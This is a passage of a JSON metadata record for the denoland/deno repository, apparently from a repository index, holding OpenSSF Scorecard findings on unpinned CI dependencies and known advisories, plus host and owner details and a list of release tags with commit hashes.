.github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab